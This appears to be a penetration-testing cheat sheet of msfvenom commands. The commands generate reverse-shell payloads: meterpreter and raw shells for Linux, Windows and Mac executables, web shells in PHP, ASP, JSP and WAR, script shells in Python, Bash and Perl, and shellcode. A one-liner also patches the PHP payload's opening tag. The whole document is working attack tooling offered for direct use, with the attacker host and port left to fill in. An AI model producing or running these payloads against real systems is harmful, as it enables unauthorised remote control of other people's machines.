• Linux

    1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
  • Windows

    1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
  • Mac

    1. msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

    Web Payloads

  • PHP

    1. msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
    1. cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
  • ASP

    1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
  • JSP

    1. msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
  • WAR

    1. msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Scripting Payloads

  • Python

    1. msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
  • Bash

    1. msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
  • Perl

    1. msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
  • Shellcode:

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

  • Linux Based Shellcode

    1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
  • Windows Based Shellcode

    1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
  • Mac Based Shellcode

    1. msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f